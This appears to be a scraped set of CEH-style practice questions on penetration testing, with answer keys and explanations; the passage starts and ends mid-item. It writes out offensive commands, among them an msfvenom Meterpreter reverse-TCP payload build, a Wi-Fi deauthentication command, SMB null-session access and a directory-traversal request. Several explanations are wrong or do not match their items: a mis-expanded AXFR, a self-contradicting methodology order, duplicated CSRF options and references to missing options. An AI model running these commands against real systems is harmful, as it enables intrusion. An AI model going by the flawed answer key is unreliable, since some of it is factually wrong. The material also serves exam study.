C.Cross-site scripting
D.DNS cache poisoning
AnswerA
MS17-010 allows RCE via SMB, famously used by WannaCry.
Why this answer
MS17-010 is a critical remote code execution vulnerability in the Microsoft Server Message Block (SMB) protocol. Exploitation allows an unauthenticated attacker to send specially crafted packets to an SMB server, enabling arbitrary code execution with system privileges. This is the same vulnerability leveraged by the EternalBlue exploit used in the WannaCry ransomware attacks.
Exam trap
The trap here is that candidates may confuse MS17-010 with a general network vulnerability, but the CEH exam specifically tests that it is a remote code execution flaw in Windows SMB, not a web or DNS attack.
How to eliminate wrong answers
Option B is wrong because SQL injection targets database query layers (e.g., SQL statements) and is unrelated to SMB protocol vulnerabilities. Option C is wrong because cross-site scripting (XSS) exploits web application input validation to inject client-side scripts, not SMB remote code execution. Option D is wrong because DNS cache poising manipulates DNS resolver caches via forged responses, which is a network-layer attack distinct from the SMB-based MS17-010 flaw.
During a penetration test, a security analyst discovers that an organization's web application uses HTTP for login forms, potentially exposing credentials to interception. Which of the following is the BEST cryptographic control to implement to protect credentials in transit?
A.Implement password hashing with bcrypt on the server side.
B.Use digital signatures to sign the login request.
C.Enforce HTTPS using TLS 1.2 or higher.
D.Encrypt the password field using AES-256 before sending via HTTP.
AnswerC
TLS encrypts the entire communication channel, protecting credentials from interception.
Why this answer
HTTPS with TLS 1.2 or higher encrypts the entire HTTP session, including login credentials, preventing interception and man-in-the-middle attacks. This is the standard cryptographic control for protecting data in transit, as mandated by RFC 2818 and PCI DSS. TLS 1.2+ uses strong cipher suites like ECDHE-RSA-AES256-GCM-SHA384 to ensure forward secrecy and confidentiality.
Exam trap
The trap here is that candidates confuse encryption at rest (hashing) or partial encryption (AES on password field) with full-session encryption (TLS), or they think digital signatures provide confidentiality, when in fact they only ensure authenticity and integrity.
How to eliminate wrong answers
Option A is wrong because password hashing with bcrypt protects credentials at rest on the server, not during transit over the network. Option B is wrong because digital signatures provide integrity and non-repudiation but do not encrypt the login request, leaving the credentials visible to an interceptor. Option D is wrong because encrypting only the password field with AES-256 before sending over HTTP still leaves the rest of the request (e.g., session tokens, form data) in plaintext, and the encryption key must be shared insecurely, defeating the purpose.
Which TWO of the following are passive reconnaissance techniques? (Select 2)
Select 2 answers
A.Performing a WHOIS lookup
B.Running an Nmap version scan
C.Performing a ping sweep
D.Using Shodan to find exposed devices
E.Banner grabbing with Netcat
AnswersA, D
WHOIS queries public registration databases without contacting the target's servers.
Why this answer
A WHOIS lookup queries public databases (e.g., ARIN, RIPE) to retrieve domain registration details such as registrar, creation date, and name server records. This is passive because it relies on publicly available information without sending any packets to the target network or interacting with its live systems.
Exam trap
EC-Council often tests the distinction between passive and active reconnaissance by making candidates confuse techniques that use public databases (passive) with those that send packets to the target (active); the trap here is that banner grabbing with Netcat feels passive because it only reads a response, but it still requires initiating a TCP connection to the target.
Which TWO of the following are techniques used to escalate privileges on a Linux system?
Select 2 answers
A.SMB relay attack
B.Pass-the-hash attack
C.Token impersonation
D.Exploiting a SUID binary
E.Kernel exploit
AnswersD, E
SUID binaries run with the owner's privileges, allowing escalation.
Why this answer
Option D is correct because SUID (Set User ID) binaries execute with the file owner's privileges, typically root. If a misconfigured SUID binary (e.g., one that allows command injection or arbitrary file reads) is exploited, an attacker can escalate from a low-privileged user to root. Common examples include exploiting SUID on binaries like `find`, `nmap`, or custom scripts with weak permissions.
Exam trap
The trap here is that candidates confuse Windows-specific privilege escalation techniques (SMB relay, pass-the-hash, token impersonation) with Linux-specific methods, assuming they are cross-platform.
Based on the exhibit, which service should be targeted first to gain initial access with the highest chance of success?
A.HTTP (80) - exploit Apache vulnerability
B.SSH (22) - brute force user credentials
C.Proxy (8080) - exploit Squid vulnerability
D.MySQL (3306) - exploit CVE-2016-6662
AnswerD
This critical vulnerability allows remote code execution without authentication, making it the best initial vector.
Why this answer
MySQL (3306) is the correct target because CVE-2016-6662 is a critical remote code execution vulnerability in MySQL that allows an attacker to inject malicious configuration directives via a crafted `my.cnf` file, leading to arbitrary code execution with the privileges of the MySQL daemon (typically root). This provides a reliable, high-impact initial access vector without requiring authentication or brute-forcing, making it the highest-chance option among the listed services.
Exam trap
EC-Council often tests the misconception that HTTP or SSH are always the easiest initial footholds, but in this scenario the MySQL CVE-2016-6662 exploit is a known, high-success-rate vector that requires no brute-forcing or version guessing, making it the most reliable choice for initial access.
How to eliminate wrong answers
Option A is wrong because exploiting an Apache vulnerability on port 80 typically requires a known, unpatched CVE with a working exploit, and Apache is generally well-hardened; the question does not specify a vulnerable version, so this is a lower-probability guess. Option B is wrong because brute-forcing SSH (22) credentials is noisy, time-consuming, and often blocked by rate-limiting or fail2ban, making it unreliable for initial access unless weak credentials are confirmed. Option C is wrong because exploiting a Squid vulnerability on port 8080 is uncommon; Squid is a caching proxy with a relatively small attack surface, and most Squid exploits target misconfigurations (e.g., open proxy) rather than providing direct shell access.
Which tool is specifically designed to enumerate SMB shares and user accounts on a Windows target by leveraging the SMB protocol?
A.Enum4linux
B.Wireshark
C.Nmap
D.Hydra
AnswerA
Correct tool for SMB enumeration.
Why this answer
enum4linux is a Perl script that wraps Samba tools (like smbclient, rpclient, net) to enumerate SMB shares, users, groups, and more from Windows hosts.
A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?
A.Command injection
B.Local File Inclusion (LFI)
C.SQL injection
D.Directory traversal
AnswerA
The parameter 'cmd' suggests the CGI script passes input to a shell, allowing command injection.
Why this answer
The 'cmd' parameter in a CGI script is a common indicator of command injection, where the attacker tries to execute system commands.
Which TWO of the following Nmap scans are considered 'stealth' scans that do not complete a full TCP three-way handshake?
Select 2 answers
A.FIN scan (-sF)
B.TCP connect scan (-sT)
C.UDP scan (-sU)
D.SYN scan (-sS)
E.ACK scan (-sA)
AnswersA, D
-sF sends FIN packets and does not complete a handshake.
Why this answer
A FIN scan (-sF) sends a TCP packet with only the FIN flag set. According to RFC 793, if the port is closed, the target responds with an RST packet; if open, the packet is ignored. This avoids completing a full TCP three-way handshake, making it a stealth scan.
Exam trap
The trap here is that candidates often confuse 'stealth' with 'invisible' and incorrectly assume that any scan not completing a handshake qualifies, but the CEH defines stealth scans specifically as those that avoid the full three-way handshake (SYN, FIN, Xmas, Null) and are designed to evade detection, not just any non-handshake scan like ACK scan.
A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?
A.Submit a base64-encoded payload in a cookie
B.Use SQLMap with a time-based payload
C.Modify the Host header to point to localhost
D.Send a request with a URL parameter pointing to an internal IP address
AnswerD
SSRF occurs when the server fetches a URL provided by the attacker; pointing to an internal IP tests for SSRF.
Why this answer
Crafting a request that makes the server fetch an internal IP address (like 127.0.0.1) and observing if the response includes data from that internal resource is a good test for SSRF.
A penetration tester runs `snmpwalk -c public -v2c 192.168.1.50 1.3.6.1.2.1.1` and receives a list of system descriptions, uptime, and contact information. Which type of information is the tester primarily gathering?
A.SMB share names and permissions
B.System information and version details
C.Network topology and routing tables
D.Active directory users and groups
AnswerB
The system group OID provides hostname, OS version, uptime, and contact info.
Why this answer
The `snmpwalk` command with the OID `1.3.6.1.2.1.1` (the system group in MIB-II, defined in RFC 1213) queries the SNMP agent for system-level information. The output includes system description, uptime, contact, and version details, which are all part of the system group. This is a classic enumeration technique to gather system information and version details from a target device using SNMP with the default public community string.
Exam trap
The trap here is that candidates often confuse the system group OID (1.3.6.1.2.1.1) with other MIB branches like the interfaces group or IP group, leading them to incorrectly select network topology or routing tables, but the system group specifically returns device identity and version information.
How to eliminate wrong answers
Option A is wrong because SMB share names and permissions are enumerated using tools like `smbclient` or `enum4linux`, not via SNMP OID 1.3.6.1.2.1.1, which is the system group. Option C is wrong because network topology and routing tables are obtained from OIDs under 1.3.6.1.2.1.4 (IP group) and 1.3.6.1.2.1.4.21 (ipRouteTable), not the system group. Option D is wrong because Active Directory users and groups are typically enumerated via LDAP queries or tools like `ldapsearch`, not through SNMP, which does not expose AD object data via the system group OID.
During a penetration test, you successfully gain access to a web server with a low-privileged shell. You want to escalate privileges to root. Which of the following techniques is MOST likely to achieve privilege escalation on a misconfigured Linux system?
A.Use the `netcat` tool to establish a reverse shell back to the attacker
B.Search for and exploit a SUID binary that allows privilege escalation
C.Use a password cracking tool like John the Ripper on the system's shadow file
D.Perform a brute force attack on the root password
AnswerB
SUID binaries execute with the owner's privileges. If a binary like `find` or `vim` has SUID set, it can be exploited to run commands as root.
Why this answer
Option B is correct because SUID (Set User ID) binaries execute with the privileges of the file owner, typically root. On a misconfigured Linux system, a low-privileged user can run a SUID-root binary (e.g., `find`, `vim`, `nmap`) to spawn a shell with root privileges, directly achieving privilege escalation without needing credentials or additional exploits.
Exam trap
The trap here is that candidates confuse establishing a reverse shell (which maintains the current privilege level) with privilege escalation, or they assume password cracking is feasible without first obtaining the hashed password file.
How to eliminate wrong answers
Option A is wrong because `netcat` is a network utility for establishing reverse shells or listening for connections; it does not escalate privileges—it only provides a remote shell at the current privilege level. Option C is wrong because John the Ripper cracking the shadow file requires read access to `/etc/shadow`, which a low-privileged shell typically does not have (shadow file is readable only by root or the shadow group). Option D is wrong because brute-forcing the root password is impractical: it requires network or console access, risks account lockout, and is noisy; moreover, the goal is to exploit a misconfiguration, not guess credentials.
An analyst reviews the following HTTP response: HTTP/1.1 200 OK
Set-Cookie: sessionid=abc123; SameSite=None; Secure
...
<html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?
A.Cross-site request forgery (CSRF)
B.Clickjacking
C.Cross-site scripting (XSS)
D.Session fixation
AnswerA
With SameSite=None, cookies are sent on cross-site requests, and without CSRF tokens, the application is vulnerable to CSRF.
Why this answer
SameSite=None allows cross-site requests to include cookies, making CSRF possible if no CSRF tokens are used. SameSite=Lax or Strict would block some CSRF attacks.
Which TWO of the following Nmap flags are used for evasion of IDS/IPS? (Choose two.)
Select 2 answers
A.-sV
B.-O
C.-D
D.-f
E.-sT
AnswersC, D
Decoy scan uses multiple source IPs to confuse IDS.
Why this answer
Option C (-D) is correct because the Nmap decoy scan flag allows you to spoof multiple source IP addresses, making it difficult for IDS/IPS to distinguish the real scanning host from decoys. Option D (-f) is correct because fragmenting packets (e.g., using -f to split TCP headers into 8-byte fragments) evades signature-based detection by bypassing pattern-matching rules that expect complete packet headers.
Exam trap
EC-Council often tests the misconception that -sV or -O are evasion techniques because they are 'stealthy' in some contexts, but the CEH exam specifically requires knowing that decoys (-D) and fragmentation (-f) are the standard Nmap evasion flags.
Which TWO of the following are examples of application-layer DDoS attacks?
Select 2 answers
A.ICMP flood
B.Slowloris
C.SYN flood
D.HTTP flood
E.UDP flood
AnswersB, D
Slowloris keeps many connections open by sending partial HTTP requests.
Why this answer
Slowloris and HTTP flood are application-layer attacks targeting the web server's ability to handle requests. SYN flood and UDP flood are lower-layer attacks (transport and network).
During a penetration test, you run the command `enum4linux -a 192.168.1.10` and receive output containing user account names, group memberships, and share listings. Which protocol is primarily being enumerated?
A.NFS
B.SMB
C.SNMP
D.SMTP
AnswerB
Correct. enum4linux performs SMB enumeration, extracting information like users, shares, and policies from Windows systems.
Why this answer
enum4linux is a tool specifically designed to enumerate information from Windows and Samba systems via the SMB (Server Message Block) protocol. The command `enum4linux -a 192.168.1.10` performs a comprehensive scan that retrieves user accounts, group memberships, and share listings, all of which are exposed through SMB's named pipe and RPC mechanisms. SMB is the correct protocol because it is the primary means for file and printer sharing in Windows networks, and enum4linux leverages SMB's IPC$ share and SAMR/LSA RPC services to extract this data.
Exam trap
The trap here is that candidates often confuse enum4linux with tools like 'showmount' for NFS or 'snmpwalk' for SNMP, but the key is that enum4linux is explicitly built for SMB enumeration, and the output of user accounts and shares is a hallmark of SMB, not NFS or SNMP.
How to eliminate wrong answers
Option A is wrong because NFS (Network File System) is a Unix/Linux-based file-sharing protocol that does not expose user account or group membership details via enum4linux; enum4linux is designed for SMB/CIFS environments, not NFS mounts. Option C is wrong because SNMP (Simple Network Management Protocol) is used for network device monitoring and management, not for enumerating user accounts or shares; enum4linux does not interact with SNMP agents. Option D is wrong because SMTP (Simple Mail Transfer Protocol) is an email delivery protocol and has no mechanism for listing user accounts, group memberships, or file shares; enum4linux targets SMB services, not mail servers.
Which TWO of the following are valid SMTP enumeration commands that can be used to discover valid email addresses? (Select 2)
Select 2 answers
A.HELO
B.RCPT TO
C.EXPN
D.ATRN
E.VRFY
AnswersC, E
EXPN expands a mailing list, revealing member addresses.
Why this answer
EXPN is a valid SMTP command that requests the server to expand a mailing list or alias, revealing the individual email addresses that belong to it. This enumeration technique is useful for discovering valid email addresses without sending a message, as defined in RFC 821.
Exam trap
The trap here is that candidates confuse RCPT TO with VRFY or EXPN, thinking that specifying a recipient during mail delivery is the same as a dedicated enumeration command, but RCPT TO is part of the mail transaction flow and not a standalone enumeration command.
An analyst executes 'nmap -sU -p 161,162 10.0.0.1'. What is the primary purpose of this scan?
A.Detect TCP services on the target
B.Enumerate all open ports on the target
C.Discover SNMP services running on the target
D.Perform a SYN flood attack
AnswerC
UDP ports 161 (SNMP) and 162 (SNMP trap) are scanned.
Why this answer
The `-sU` flag instructs Nmap to perform a UDP scan, and the `-p 161,162` targets the default SNMP ports (UDP 161 for SNMP queries, UDP 162 for SNMP traps). This combination is specifically designed to discover SNMP services running on the target host, as SNMP operates exclusively over UDP. Option C is correct because the command's primary purpose is to probe for SNMP services.
Exam trap
The trap here is that candidates often confuse `-sU` with TCP scans or assume the command scans all ports, but CEH specifically tests the understanding that `-sU` with `-p 161,162` targets SNMP over UDP, not general port enumeration or attacks.
How to eliminate wrong answers
Option A is wrong because `-sU` specifies a UDP scan, not a TCP scan; TCP services are detected using `-sT` or `-sS`, not `-sU`. Option B is wrong because the command only scans ports 161 and 162, not all ports; enumerating all open ports would require a broader port range (e.g., `-p-`) or a different scan type. Option D is wrong because a SYN flood attack is a denial-of-service technique using TCP SYN packets, whereas this is a reconnaissance scan using UDP probes; Nmap does not perform attacks by default.
A security analyst runs `nbtstat -A 192.168.1.10` and receives a response with the computer name, logged-in user, and domain. Which protocol is being queried?
A.NetBIOS
B.SNMP
C.LDAP
D.SMTP
AnswerA
Why this answer
The `nbtstat -A` command performs a NetBIOS name service query (NBNS) against the target IP address using UDP port 137. It retrieves the NetBIOS name table, which includes the computer name, logged-in user, and domain membership, directly from the NetBIOS over TCP/IP (NetBT) protocol stack.
Exam trap
The trap here is that candidates confuse `nbtstat -A` (which queries NetBIOS over TCP/IP) with `nbtstat -a` (which queries by name) or assume it uses a different protocol like SMB, but the command specifically targets the NetBIOS name service on UDP 137.
How to eliminate wrong answers
Option B is wrong because SNMP (Simple Network Management Protocol) uses UDP ports 161/162 and is queried with tools like `snmpget` or `snmwalk`, not `nbtstat`. Option C is wrong because LDAP (Lightweight Directory Access Protocol) operates over TCP port 389 and is used to query directory services like Active Directory, not to retrieve NetBIOS names. Option D is wrong because SMTP (Simple Mail Transfer Protocol) uses TCP port 25 for email transfer and has no role in NetBIOS name resolution or enumeration.
During a security assessment, a tester uses `nmap -sU 192.168.1.1`. What type of scan does this command perform?
A.UDP scan
B.TCP SYN scan
C.Ping sweep
D.OS fingerprinting
AnswerA
-sU scans UDP ports.
Why this answer
The `-sU` flag in Nmap explicitly instructs the tool to perform a UDP scan. This sends UDP packets to the target ports and analyzes responses (or lack thereof) to determine if a UDP port is open, closed, or filtered. Unlike TCP, UDP is connectionless, so the scan relies on ICMP unreachable messages or lack of response to infer port status.
Exam trap
The trap here is that candidates confuse the `-sU` flag with a TCP SYN scan (`-sS`) or assume it performs a general host discovery, but the question specifically tests knowledge of Nmap's scan type flags.
How to eliminate wrong answers
Option B is wrong because TCP SYN scan uses the `-sS` flag, not `-sU`, and relies on the TCP three-way handshake (sending a SYN packet) to determine port states. Option C is wrong because a ping sweep typically uses ICMP echo requests (or TCP/UDP probes to multiple hosts) to discover live hosts, not a single target with UDP probes; the command `nmap -sn` is used for ping sweeps. Option D is wrong because OS fingerprinting is performed with options like `-O` or `-A`, which analyze TCP/IP stack behavior, not a simple UDP scan.
A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
A.Generating a Trojan
B.Creating a virus
C.Deploying a worm
D.Initiating a DoS attack
AnswerA
The payload is a backdoor that allows remote control, characteristic of a Trojan.
Why this answer
Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).
Which THREE of the following are indicators that a system has been compromised by a rootkit? (Select 3)
Select 3 answers
A.Anti-virus software is disabled and cannot be restarted
B.Hidden processes that do not appear in process lists
C.Unexplained network connections to known command-and-control servers
D.Event logs show repeated successful logins from unknown IPs
E.Increased disk space usage without explanation
AnswersA, B, C
Rootkits may disable security software to avoid detection.
Why this answer
Rootkits hide processes, files, and registry keys. Common signs include hidden processes, unexplained network connections, and disabled security tools. Altered file hashes are also indicators but are more generic.
A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)
Select 2 answers
A.Use out-of-band SQL injection with DNS exfiltration
B.Use a time-based blind SQL injection with SLEEP() function
C.Leverage error-based SQL injection with CONVERT() or double query
D.Use SQLMap with --union-col and --union-from flags
E.Implement parameterized queries in the application code
AnswersC, D
Error-based injection exploits verbose error messages to extract data.
Why this answer
Union-based SQL injection uses UNION SELECT to retrieve data from other tables. Error-based SQL injection leverages database error messages to extract information. Both are common in-band techniques suitable when errors are displayed.
While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?
The '../' patterns and the file path indicate directory traversal, resulting in file disclosure.
Why this answer
The path contains '../' sequences indicating directory traversal. A 200 response suggests the attacker successfully read the /etc/passwd file, leading to disclosure of system user accounts. This can aid further attacks like password cracking.
An incident responder analyzes logs and finds repeated failed zone transfer attempts from an external IP. The zone transfer requests are targeting the domain example.com. Which DNS record type, if misconfigured, would allow this attack to succeed?
A.NS records
B.AXFR
C.MX records
D.SOA records
AnswerB
AXFR is the DNS query type for zone transfers. Allowing AXFR from unauthorized hosts is a misconfiguration.
Why this answer
B is correct because AXFR (Asynchronous Full Transfer) is the DNS zone transfer protocol that, if misconfigured (i.e., allowing unrestricted AXFR queries from any IP), permits an external attacker to request and receive the entire DNS zone file for example.com. The repeated failed attempts indicate the attacker is probing for an open AXFR service, which would succeed if the DNS server is configured to allow zone transfers to any host without restriction.
Exam trap
The trap here is that candidates confuse the DNS record type (e.g., NS, SOA) with the protocol or query type (AXFR) used to perform the zone transfer, leading them to select a record type instead of recognizing AXFR as the specific misconfiguration that enables the attack.
How to eliminate wrong answers
Option A is wrong because NS records specify the authoritative name servers for a domain, not the mechanism for transferring zone data; misconfigured NS records could lead to delegation issues but do not directly allow zone transfer attacks. Option C is wrong because MX records define mail exchange servers for email routing and have no role in DNS zone transfers; they are irrelevant to the attack described. Option D is wrong because SOA records contain administrative metadata about the zone (e.g., serial number, refresh interval) but do not control or enable zone transfer requests; misconfigured SOA records might affect zone replication timing but not allow external AXFR queries.
Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?
Select 2 answers
A.Using SameSite cookies
B.Input validation
C.Using anti-CSRF tokens
D.Using HTTPOnly cookies
E.Using CSRF tokens
AnswersA, E
SameSite cookies restrict cookie sending on cross-site requests, mitigating CSRF.
Why this answer
CSRF tokens and SameSite cookies are standard defenses. The other options do not prevent CSRF: input validation does not; anti-CSRF tokens are synonymous; referer header validation is weak.
You are a security analyst for a medium-sized company. The company uses a custom web application for internal project management. The application uses AES-256-CBC for encrypting sensitive data stored in the database. Recently, the company experienced a data breach where an attacker exfiltrated the entire database. Although the data was encrypted, the attacker was able to decrypt some records. Investigation reveals that the encryption key is stored in a configuration file on the same server, and the initialization vector (IV) is hardcoded in the application code. Additionally, the application uses the same key for all records. Which of the following is the most effective remediation to prevent future decryption of stolen encrypted data?
A.Change the encryption mode from CBC to GCM to provide authentication
B.Store the encryption key in a hardware security module (HSM) and use the same key
C.Rotate the encryption key every 24 hours
D.Implement per-record encryption keys derived from a master key combined with a unique salt
AnswerD
Each record gets a unique key; compromise of one key does not affect others.
Why this answer
Option D is correct because using per-record encryption keys derived from a master key combined with a unique salt ensures that even if an attacker exfiltrates the entire database, each encrypted record requires a separate key derivation operation. Without the unique salt per record, the attacker cannot decrypt all records even if they compromise the master key. This approach mitigates the risk of a single key compromise leading to bulk decryption, which is the core vulnerability in the current setup where the same AES-256-CBC key and hardcoded IV are reused across all records.
Exam trap
The trap here is that candidates often focus on key storage or rotation (options B and C) as the primary solution, overlooking that the real vulnerability is the reuse of a single key across all records, which allows an attacker to decrypt the entire dataset with a single key compromise.
How to eliminate wrong answers
Option A is wrong because changing the encryption mode from CBC to GCM adds authentication (integrity) but does not address the fundamental issue of a single static key and IV being reused; an attacker who steals the database and the key can still decrypt all records regardless of the mode. Option B is wrong because storing the encryption key in an HSM while still using the same key for all records does not prevent an attacker from decrypting all stolen data if they compromise the application at runtime or obtain the key from the HSM via authorized access; the HSM protects the key at rest but does not mitigate the single-key reuse vulnerability. Option C is wrong because rotating the encryption key every 24 hours only limits the window of exposure for future records; it does not protect already exfiltrated encrypted data that was encrypted with the old key, and the attacker can still decrypt all records encrypted before the rotation if they have the old key.
During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
A.Session hijacking
B.MAC flooding
C.DNS spoofing
D.ARP poisoning
AnswerD
ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.
Why this answer
ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.
A penetration tester runs the following command against a Linux server: `smbclient -L //192.168.1.10 -N`. The output lists shares including 'IPC$', 'ADMIN$', and 'data'. Which of the following is the BEST next step to enumerate the 'data' share?
B.Run `enum4linux -a 192.168.1.10` to gather more information
C.Use `rpcclient -U '' 192.168.1.10` to enumerate users
D.Use `smbclient //192.168.1.10/data -N` to attempt a null session connection
AnswerD
This attempts to access the share anonymously; if successful, the tester can list files.
Why this answer
The command `smbclient -L //192.168.1.10 -N` performs a null session (no password) listing of SMB shares. The output shows that the 'data' share exists and is accessible without authentication (since the -N flag succeeded). The best next step is to attempt a null session connection to that specific share using `smbclient //192.168.1.10/data -N`, which will mount the share and allow file enumeration.
This directly leverages the null session already confirmed by the initial scan.
Exam trap
The trap here is that candidates often choose a broad enumeration tool like enum4linux or an nmap script, thinking they need more information first, when the direct connection to the already-discovered share is the logical and efficient next step in a penetration test.
How to eliminate wrong answers
Option A is wrong because `nmap --script smb-enum-shares -p 445` would re-enumerate shares, which is redundant after already discovering the 'data' share via smbclient. Option B is wrong because `enum4linux -a` is a comprehensive enumeration tool that gathers users, groups, shares, and policies, but it is a broader, slower step that does not directly access the 'data' share; the immediate goal is to connect to the share, not gather more metadata. Option C is wrong because `rpcclient -U ''` is used for RPC-based enumeration (e.g., users, SIDs) via the IPC$ share, not for accessing a file share like 'data'; it would not list or retrieve files from the 'data' share.
A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
Select 2 answers
A.Smurf attack
B.Volumetric attack
C.Application-layer (Layer 7) attack
D.SYN flood attack
E.Distributed denial-of-service (DDoS) attack
AnswersC, E
HTTP GET requests targeting a specific page are application-layer.
Why this answer
HTTP flood is an application-layer DDoS sending many seemingly legitimate requests. Distributed means many sources. Volumetric floods use high bandwidth, and SYN flood uses TCP handshake.
During a penetration test, a tester captures a WPA2 4-way handshake. Which of the following is the NEXT step to attempt to recover the Wi-Fi passphrase?
A.Use aircrack-ng to crack the WEP key from the handshake
B.Run a dictionary attack using aircrack-ng with a wordlist
C.Brute-force the WPS PIN using Reaver
D.De-authenticate the client from the network again to capture another handshake
AnswerB
Correct. The handshake is used to attempt offline password cracking against a wordlist.
Why this answer
After capturing the handshake, the tester must perform a dictionary attack against the handshake file. Tools like aircrack-ng or hashcat can compare the handshake against a wordlist of potential passphrases.
A penetration tester uses the following Google dork: site:example.com filetype:pdf inurl:confidential. What is the MOST likely goal of this search?
A.Retrieve all PDF files from example.com regardless of content
B.Identify all web pages on example.com that link to PDF files
C.Find PDF files on example.com that have 'confidential' in their filename or path
D.Discover PDF files that contain the word 'confidential' on example.com
AnswerC
The 'inurl:confidential' operator matches the string 'confidential' anywhere in the URL, which includes filenames and directory paths. Combined with 'filetype:pdf', this finds PDFs with 'confidential' in the URL.
Why this answer
The Google dork `site:example.com filetype:pdf inurl:confidential` combines the `site` operator to restrict results to example.com, `filetype:pdf` to filter for PDF files, and `inurl:confidential` to require that the URL or path contains the word 'confidential'. This targets PDF files whose filename or directory path includes 'confidential', making option C correct. The `inurl` operator matches the URL string, not the file content, so it does not search within the PDF text.
Exam trap
The trap here is confusing `inurl` (which searches the URL string) with `intext` or content-based search, leading candidates to incorrectly assume the dork finds PDFs containing the word 'confidential' inside the document.
How to eliminate wrong answers
Option A is wrong because the dork includes `inurl:confidential`, which narrows results to PDFs with 'confidential' in the URL, not all PDFs. Option B is wrong because the dork retrieves PDF files directly, not web pages that link to PDFs; `filetype:pdf` returns the PDF file itself. Option D is wrong because `inurl` searches the URL string, not the content of the PDF; to search within file content, one would use `intext` or `filetype:pdf` combined with a content search term like `"confidential"` without `inurl`.
A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
A.Smurf attack
B.Ping of Death
C.SYN flood
D.Slowloris
AnswerA
ICMP to broadcast addresses with spoofed source IP.
Why this answer
A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.
Which of the following Google dorks would an attacker MOST likely use to find login pages of web applications that are publicly accessible?
A.intitle:login
B.inurl:robots.txt
C.filetype:pdf
D.cache:example.com
AnswerA
This dork returns pages where the title contains 'login', often used to find login portals.
Why this answer
The Google dork 'intitle:login' is most effective for finding login pages because it searches for the word 'login' in the HTML title tag of web pages. Attackers use this to quickly identify publicly accessible authentication portals, which are common entry points for brute-force or credential-stuffing attacks. This dork directly targets the page title, a standard HTML element that often contains the word 'login' on authentication pages.
Exam trap
EC-Council often tests the distinction between operators that find specific page content (like 'intitle:') versus those that find file types or cached data, leading candidates to confuse 'inurl:robots.txt' (which finds a specific file) with finding login pages.
How to eliminate wrong answers
Option B is wrong because 'inurl:robots.txt' is used to find the robots.txt file, which discloses directories that the site owner wants to hide from search engines, not login pages. Option C is wrong because 'filetype:pdf' restricts results to PDF files, which are unlikely to be login pages (login pages are typically HTML). Option D is wrong because 'cache:example.com' shows the cached version of a specific domain, not a search for login pages across multiple sites.
During a penetration test, you gain access to a target system as a low-privileged user. Which of the following is the BEST next step according to the CEH system hacking methodology (CHPSET)?
A.Execute applications to extract data
B.Hide files to conceal tools and data
C.Erase event logs to avoid detection
D.Escalate privileges to gain higher-level access
AnswerD
Privilege escalation is the third step in CHPSET, following cracking passwords and hiding files, and is appropriate after initial low-privileged access.
Why this answer
The CEH methodology follows: Cracking passwords, Hiding files, Privilege escalation, Executing applications, Spying, Erasing tracks. After gaining initial access as a low-privileged user, the next logical step is to escalate privileges to gain higher access (e.g., administrator or root).
Which of the following tools would be BEST to use for identifying all live hosts in a large IP range (e.g., 10.0.0.0/8) quickly?
A.Masscan
B.OpenVAS
C.Nmap with -sL flag
D.hping3
AnswerA
Masscan is optimized for speed and can scan large ranges quickly.
Why this answer
Masscan is the best choice because it is designed for high-speed scanning across large IP ranges, capable of transmitting packets at rates exceeding 10 million packets per second. It uses asynchronous transmission and raw sockets to quickly identify live hosts by sending SYN probes and analyzing responses, making it ideal for scanning a /8 subnet (16.7 million addresses) in minutes.
Exam trap
EC-Council often tests the distinction between scanning speed and functionality, where candidates mistakenly choose Nmap (a versatile tool) for large-range host discovery without recognizing that its default scanning modes are too slow for a /8 subnet, whereas Masscan is purpose-built for speed.
How to eliminate wrong answers
Option B (OpenVAS) is wrong because it is a vulnerability scanner that performs in-depth analysis on identified hosts, not a tool for rapid host discovery across large ranges; its scanning speed is too slow for a /8 subnet. Option C (Nmap with -sL flag) is wrong because the -sL flag performs a list scan that only resolves DNS names without sending any packets, so it cannot identify live hosts. Option D (hping3) is wrong because it is a packet crafting tool used for targeted testing and firewall auditing, not designed for high-speed scanning of massive IP ranges; its sequential packet transmission makes it impractical for a /8 subnet.
During a penetration test, an ethical hacker runs the following command: aireplay-ng -0 5 -a 00:11:22:33:44:55 -c 66:77:88:99:AA:BB wlan0mon. What is the immediate effect of this command?
A.It performs a WEP injection attack to generate traffic
B.It cracks the pre-shared key using a dictionary
C.It forces the client to disconnect and reconnect, capturing the WPA handshake
D.It initiates a brute force attack on the WPS PIN
AnswerC
Deauthentication attack (aireplay-ng -0) disconnects a client; reconnection allows capture of the 4-way handshake.
Why this answer
The -0 flag sends deauthentication packets to force a client to reconnect, enabling capture of the WPA handshake.
A security analyst suspects that an attacker is scanning their network. They notice a large number of TCP SYN packets being sent to various ports on a single host, but no SYN-ACK responses are returned. Which type of scan is most likely being used?
A.TCP connect scan
B.UDP scan
C.SYN scan
D.FIN scan
AnswerC
SYN scan sends SYN packets; lack of SYN-ACK indicates filtered/closed ports.
Why this answer
